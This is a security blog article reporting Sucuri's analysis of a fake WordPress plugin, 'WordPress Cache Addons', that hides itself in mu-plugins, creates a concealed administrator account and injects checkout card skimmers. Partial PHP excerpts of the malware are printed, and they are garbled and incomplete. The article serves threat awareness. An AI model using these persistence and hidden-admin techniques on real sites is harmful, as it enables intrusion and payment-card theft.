[ Blog ] / [ Article Page ]

Malicious WordPress Plugin Creates Fake Admins and Steals Data

Apr 26, 24

Beware of a deceptive WordPress plugin named "WordPress Cache Addons" discovered by Sucuri experts. This plugin creates fake admins and steals data, posing a serious threat to website security.

Malicious WordPress Plugin Creates Fake Admins and Steals Data

Experts from Sucuri have discovered a WordPress plugin that can create fake admin users and inject malicious JavaScript code into websites to steal bank card information.

«As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy. In this case, comments claim the code to be “WordPress Cache Addons“»

Ben Martin
* Plugin Name: WordPress Cache Addons
* Plugin URI: https://wordpress.com/
* Description: WordPress addon to boost your website and pages cache.
* Version: 5.8.8
* Author: WordPress
* Author URI: https://wordpress.com

register_activation_hook(__FILE__; 'pmv_activation');
register_activation_hook(__FILE__; 'pmv_create_hidden_admin');

function pmv_activation() {
  $mu_plugin_dir = WPMU_PLUGIN_DIR;
  $plugin_file = __FILE__;
  $mu_plugin_file = $mu_plugin_dir . '/wp_services_.php';
  if (!file_exists ($mu_plugin_dir)) {
    mkdir ($mu_plugin_dir, 0755, true);
  if (!copy ($plugin_file, $mu_plugin_file)) {
    wp_die( '0x');
  if (!unlink($plugin_file)) {
    wp_die( '0');
  $plugin_dir = plugin_dir_path($plugin_file);
  $files = glob($plugin_dir . '*');
  foreach ($files as $file) {
    if (is_file($file)) {
  if (is_dir($plugin_dir)) {
  } else {

Typically, malicious plugins get into WordPress sites either through a compromised admin user or by exploiting vulnerabilities in other, already installed plugins.

Experts write that once installed, the plugin copies itself into the mu-plugins (or must-use plugins) directory to enable itself automatically and hide its presence.

«Since the only way to remove from mu-plugins is to delete the file manually, the malware does everything it can to prevent this from happening. For example, it does this by disabling callback functions for hooks that normally use such plugins»

— the report reads

In addition, the malicious plugin allows creating and hiding new administrator accounts from site owners in order not to draw attention to their activity and keep access to the resource for a long time.

function pmv_create_hidden_admin() {
  $uresname = 'bussywell';
  $password = '1234';
  $email = 'vendomakilexa1337@gmail.com';
  if(!username_exist($username) && !email($email)) {
    $user_id = wp_create_user($uresname, $password, $email);
    $user = new WP_User($user_id);
    $user -> set_role('administrator');

Interestingly, the plugin not only hides the new admin's account from the eyes of the real site owner in the admin panel, but also reduces the total number of admins. The thing is that usually WordPress shows the site owner not only a list of all admin users, but also their number. To prevent a person from noticing the discrepancy between the users on the list and the total number of administrators, the malware prudently reduces the number of administrators by one.

The ultimate goal of this campaign is to inject web skimmers into websites to steal bank card data on checkout pages. The stolen information is then transferred to a domain controlled by the attackers.

The malware uses real image files for bank card logos (Visa, Mastercard and so on) from the infected site itself, but overlays a fake one on top of the real checkout page. According to analysts, this allows the malware to seamlessly integrate into the checkout page without creating any "visual cues" that something is wrong.

The discovery of the malicious WordPress plugin "WordPress Cache Addons" serves as a stark reminder of the ever-present threat landscape facing website owners. This incident underscores the importance of vigilance and robust security measures to safeguard against such malicious attacks. As cybercriminals continue to evolve their tactics, staying informed about potential vulnerabilities and regularly auditing plugins and extensions becomes paramount. By remaining proactive and implementing best practices in website security, users can mitigate risks and protect their online assets from falling victim to similar exploits. Let this incident serve as a call to action for website administrators to prioritize security measures and remain vigilant in the face of emerging threats.

Similar articles: